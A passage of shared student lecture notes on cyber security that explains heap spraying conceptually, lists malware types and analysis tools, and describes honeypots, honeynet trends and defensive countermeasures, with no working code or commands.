data is stored, which occurs during runtime. All the variables created at runtime are
allocated in the heap memory—a form of storage management that provides more
flexibility than the static or stack memory allocation
o Heap spraying is an attack technique that manipulates the heap memory area by
filling it with a large quantity of known malicious payloads. The goal is to fill the
memory space in such a way that it is more likely that the malicious code will be
executed when the browser eventually tries to execute data from the heap.
ARJUNSAI
Cyber security 53
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o How It Works:
▪ The attacker sprays the heap with shellcode or other malicious data.
▪ The victim’s browser or application may accidentally execute the shellcode,
thus allowing the attacker to gain control of the machine.
Heap spray attacks exploit vulnerabilities in a program's memory allocation process by filling
the memory with malicious code. The attacker creates a large amount of small data objects
containing the malicious code and then "sprays" or distributes them across the program's heap
memory, increasing the likelihood that the code will be executed.
Protecting Yourself from Client-Side Exploits:
ARJUNSAI
Cyber security 54
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Regularly Update Software: Ensure that your browser, plugins, and operating system
are up-to-date with the latest security patches to minimize the risk of exploitation.
o Use Security Extensions: Install browser extensions like NoScript (which blocks
JavaScript), AdBlock Plus, or uBlock Origin to reduce the attack surface by blocking
potentially malicious scripts.
o Enable Sandboxing: Sandboxing is a technique where the browser operates in a
restricted environment to limit the impact of successful exploitation. Make sure to
enable features like Chrome’s sandboxing and IE’s Enhanced Protected Mode.
o Disable Unnecessary Plugins: Disable or remove unnecessary plugins and extensions
(e.g., Flash, Java, Silverlight), as they are often targeted by attackers.
Malware Analysis
Malware analysis: is the process of studying malware to understand its functionality,
origin, and potential impact. It helps identify and mitigate threats from malware and
cyberattacks.
Types of Malware
Malware can take various forms, each with its own unique characteristics. Some common types of
malware include:
• Viruses: Programs that attach themselves to legitimate files or programs and spread when the
infected file is executed.
• Worms: Self-replicating malware that spreads across networks without needing to attach to
files.
ARJUNSAI
Cyber security 55
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
• Trojans: Malicious programs that masquerade as legitimate software to trick users into
executing them.
• Ransomware: A type of malware that encrypts a victim’s files or locks them out of their system
until a ransom is paid.
• Spyware: Malware that secretly monitors a user’s activities and sends the data to a third party.
• Adware: Malware that displays unwanted ads or collects personal data to send targeted
advertisements.
• Rootkits: Malicious software designed to conceal the presence of other malware and activities
from detection, typically at the kernel level.
• Keyloggers: Software that records keystrokes and transmits them to attackers, potentially
capturing sensitive information like passwords and credit card details002E
1) Collecting Malware
o Malware Collection: The process of gathering malware for analysis can be done
through various methods, including:
1) Honeypots: Deceptive systems designed to attract malicious actors and capture
their malware. These systems appear as vulnerable targets to attackers, who
often deploy malware upon interacting with them.
2) Botnets: Some malware is distributed via botnets, where compromised
machines are used to spread the malware to other systems.
3) Threat Intelligence Feeds: Public and private feeds provide information on
known malware samples, which can be used for analysis.
2) Initial Analysis: Once malware is collected, the initial analysis phase begins. This
involves gathering basic information about the malware, such as:
1) File Properties: Examining the file size, hash values (MD5, SHA-1), and
creation/modification times.
ARJUNSAI
Cyber security 56
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
2) Static Analysis: Inspecting the file without executing it. Tools like VirusTotal,
PEiD, and Examine32 can help identify the file type, packed or obfuscated
contents, and its behavior when run.
3) String Search: Searching the binary for readable strings that may reveal URLs,
registry keys, or other identifiable artifacts.
Malware Analysis Tools:
o Static Analysis Tools: These tools analyse malware without running it. Popular tools
include:
1) IDA Pro: A disassembler used for analyzing the executable code of the
malware.
2) Ghidra: A reverse engineering tool developed by the NSA for analyzing
compiled code.
3) Binwalk: A tool for analyzing firmware and extracted malware.
o Dynamic Analysis Tools: These tools run the malware in a controlled environment
(e.g., a sandbox) to observe its behavior.
1) Cuckoo Sandbox: A widely used tool for automatic dynamic analysis of
malware samples.
2) Wireshark: A network traffic analyzer used to capture communication between
the malware and external servers.
3) Procmon: A system monitoring tool that tracks file and registry activity.
Latest Trends in Honeynet Technology:
ARJUNSAI
Cyber security 57
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Honeynets are networks of decoy systems that mimic real networks but are designed
to capture malware and attacker activity. The technology has evolved to be more
sophisticated in capturing and analyzing threats.
Recent Trends:
1) Automated Honeynet Deployment: The use of virtual machines and cloud infrastructure to
deploy honeynets dynamically.
2) Decoy Techniques: Modern honeynets use more advanced decoy strategies, such as honeytokens
(fake credentials) and honeyfiles (files designed to attract attackers).
3) Behavioral Analysis: Advanced honeynets are now able to capture not just malware but also
detailed attacker tactics, techniques, and procedures (TTPs).
4) Virtualization & Cloud-based Honeynets:
Honeynets are now often deployed in virtualized environments or on cloud platforms. This allows
them to easily scale, be more flexible, and be deployed without the need for specialized hardware.
Cloud-based honeynets are particularly advantageous for simulating a large variety of systems and
attack surfaces.
5) Dynamic & Evolving Honeynets:
Modern honeynets are capable of adapting in real-time to mimic new technologies, operating
systems, and software. This dynamic nature makes them more difficult for attackers to identify and
enables them to attract a broader range of threat actors.
6) Integration with IoT Devices:
Honeynets now frequently include Internet of Things (IoT) devices as decoys, as IoT devices
are becoming increasingly common targets for cyberattacks. This trend is particularly useful in
detecting vulnerabilities specific to IoT devices, such as weak passwords and unsecured
protocols.
ARJUNSAI
Cyber security 58
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
7) Integration with Machine Learning & AI for Attack Pattern Recognition : The latest
honeynet technologies increasingly integrate machine learning (ML) and artificial intelligence (AI)
to detect and identify attack patterns. These technologies can help honeynets automatically identify
sophisticated attacks that might otherwise be missed by traditional monitoring techniques.
Honeynet technology continues to evolve rapidly to meet the challenges posed by modern cyber
threats. Key trends include the use of high-fidelity honey nets that closely mimic real-world systems,
the integration of AI and machine learning for attack detection and analysis, the development of
cloud-based and scalable honeynet architectures, and the growing focus on ransomware and APT
detection.
Catching Malware:
Catching malware refers to the process of detecting, analyzing, and collecting data on malicious
software (malware) in a controlled and isolated environment. This is crucial for understanding how
malware operates, its behavior, and how to prevent future infections. The act of catching malware is
typically achieved using honeypots or honeynets, which are systems deliberately designed to attract
and trap attackers.
Why Catching Malware Is Important
The main objective of catching malware is to gain deep insight into how cybercriminals operate and
how their malware functions. By observing and analyzing malware in real-time, security experts can:
1. Understand Attack Methods: Learn the tactics, techniques, and procedures (TTPs) used by
cybercriminals.
2. Develop Detection Mechanisms: Identify patterns that can be used to detect similar attacks in
the future.
3. Create Defenses: Develop more effective security measures and countermeasures based on
malware behavior.
4. Investigate Malware Evolution: Track the evolution of malware, identifying trends, new
attack vectors, and more sophisticated techniques.
5. Collect Forensic Evidence: Gather evidence that can assist in legal or regulatory proceedings.
ARJUNSAI
Cyber security 59
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
To catch malware, analysts often “Setting Traps” by:
1. Deploying decoy systems: Systems designed to appear vulnerable or valuable to
attackers.
Creating a Honeypot (The Trap Design):
A honeypot is a decoy system designed to appear as a legitimate, vulnerable target for
cybercriminals. The idea is to make it attractive enough for attackers to exploit, but isolated
enough so that the malware doesn’t affect real systems or networks.
2. Monitoring suspicious traffic: Capturing network traffic to detect malware
infections.
Monitoring Techniques:
• Network Traffic Capture:
o Use tools like Wireshark or tcpdump to capture and analyze network traffic between
the malware and the honeypot. Look for signs of command-and-control (C&C)
communication, file transfers, or data exfiltration.
• File System Monitoring:
o Track file system activity to observe malware behavior. Tools like Sysinternals Process
Monitor or Auditd log file operations, such as file creation, modification, or deletion.
• Registry Monitoring (for Windows Systems):
o Monitor changes to the Windows Registry. Malicious actors often add keys for
persistence or modify settings for their exploits.
• Process Monitoring:
o Observe processes spawned by the malware. This can provide insight into how
malware escalates privileges, spreads, or runs malicious payloads.
3. Tracking Payload Delivery: Monitoring how malware is delivered (e.g., via phishing
emails, malicious ads, etc.).
ARJUNSAI
Cyber security 60
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
4. Once the malware is detected, analysts can begin analysing it and understanding how it
behaves and what it targets.
Initial Malware Analysis:
The main purpose of catching malware is to perform analysis on the captured data. This helps
security professionals understand how the malware works, how to defend against it, and how to
detect it in the future.
Analysis Process:
1. Static Analysis:
o Analyze the malware without executing it. This can include examining its file structure, code,
and libraries to understand its functions.
o Use tools like IDA Pro or Ghidra to reverse-engineer the malware and identify key indicators.
2. Dynamic Analysis:
o Execute the malware in a sandboxed or isolated environment to monitor its behavior. This
involves observing its system impact, network activity, and interaction with other files and
processes.
o Tools like Cuckoo Sandbox or REMnux can be used to analyze malware behavior in real-time.
3. Reverse Engineering:
o For advanced malware, reverse engineering may be necessary to fully understand its code and
functions.
o This process helps identify exploits, attack vectors, and vulnerabilities in the malware that can
be used to create signatures or countermeasures.
4. IOC Generation:
o Based on the analysis, create Indicators of Compromise (IOCs), such as file hashes, domain
names, IP addresses, and URLs that can be used to detect or block the malware.
Analysis Tools:
1) Process Explorer: Used to analyse active processes and memory in a system.
ARJUNSAI
Cyber security 61
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
2) Sysinternals Suite: A set of advanced diagnostic tools for analyzing system
behaviour during malware execution.
Defending Against Malware: Creating Countermeasures
The insights gained from catching and analyzing malware can help create more effective defenses. By
studying attack patterns, security teams can develop countermeasures to protect systems from similar
threats.
Defense Strategies:
1. Signature-Based Detection:
o Use IOCs from the captured malware to develop detection signatures that can be
integrated into intrusion detection systems (IDS), firewalls, and antivirus software.
2. Behavioral Analysis:
o Develop detection systems that look for suspicious behavior, such as unexpected
changes in files, network traffic patterns, or system calls.
3. Patch Management:
o Ensure that systems are regularly updated to prevent exploitation of known
vulnerabilities that are often targeted by malware.
4. Honeypot Updates:
o Continuously update honeypots to reflect the latest vulnerabilities and malware trends.
This ensures they stay relevant and capable of attracting new malware variants.
5. User Awareness and Training:
o Conduct training for employees and users to recognize phishing attempts and other
social engineering tactics that can lead to malware infections.
ARJUNSAI
Cyber security 62
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
ARJUNSAI
Cyber security 63
Downloaded by Sai Tejaswini ([email protected])
You might also like
- 31 IT Network System Administration - Kisi2 Deskripsi Teknis LKS Dikmen Tk. Jatim 2025No ratings yet31 IT Network System Administration - Kisi2 Deskripsi Teknis LKS Dikmen Tk. Jatim 20256 pages
- Implementation of Electronic Data Capture Systems: Barriers and SolutionsNo ratings yetImplementation of Electronic Data Capture Systems: Barriers and Solutions8 pages
- Guidelines of Water Source Application (Developer) Syarikat Bekalan Air Selangor Sdn. BHDNo ratings yetGuidelines of Water Source Application (Developer) Syarikat Bekalan Air Selangor Sdn. BHD3 pages
- 4 - Service Oriented Architecture and Web ServicesNo ratings yet4 - Service Oriented Architecture and Web Services26 pages
- Prac Cal - 1: Write HTML Code To Develop A Web Page With Red Back Ground Tle "My First Page" & Give Your DetailsNo ratings yetPrac Cal - 1: Write HTML Code To Develop A Web Page With Red Back Ground Tle "My First Page" & Give Your Details39 pages
